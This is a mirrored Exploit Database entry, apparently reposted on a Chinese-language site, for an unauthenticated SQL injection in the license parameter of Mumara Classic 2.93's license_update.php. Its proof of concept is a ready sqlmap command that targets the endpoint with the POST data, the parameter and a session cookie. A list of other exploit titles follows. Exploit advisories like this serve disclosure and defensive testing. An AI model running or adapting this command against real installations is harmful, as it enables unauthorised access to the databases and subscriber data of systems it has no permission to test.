Mumara Classic 2.93 – ‘license’ SQL Injection (Unauthenticated)

Exploit Database
11 阅读

作者： Shain Lakin

日期： 2021-11-12
类别：
- webapps
平台：
- multiple
来源：https://www.exploit-db.com/exploits/50518/

# Exploit Title: Mumara Classic 2.93 - 'license' SQL Injection (Unauthenticated)
# Date: 2021-11-11
# Exploit Author: (v0yager) Shain Lakin
# Vendor Homepage: https://mumara.com
# Version: <= 2.93
# Tested on: CentOS 7

-==== Vulnerability ====-

An SQL injection vulnerability in license_update.php in Mumara Classic
through 2.93 allows a remote unauthenticated attacker to execute
arbitrary SQL commands via the license parameter.

-==== POC ====-

Using SQLMap:

sqlmap -u https://target/license_update.php --method POST --data "license=MUMARA-Delux-01x84ndsa40&install=install" -p license --cookie="PHPSESSID=any32gbaer3jaeif108fjci9x" --dbms=mysql

last Exploits
Mumara Classic 2.93 – ‘license’ SQL Injection (Unauthenticated)的更多信息

PHP < 8.3.8 - Remote Code Execution (Unauthenticated) (Windows)：
RV Shopping Cart – Cross-Site Request Forgery：
Savsoft Quiz 5 – Stored Cross-Site Scripting：
Alienvault OSSIM/USM 4.14/4.15/5.0 – Multiple Vulnerabilities：
Pentaho < 4.5.0 - User Console XML Injection：
MyDomoAtHome REST API Domoticz ISS Gateway 0.2.40 – Information Disclosure：
GlobalWebTek Design – SQL Injection：
Novell ServiceDesk 6.5/7.0.3/7.1.0 – Multiple Vulnerabilities：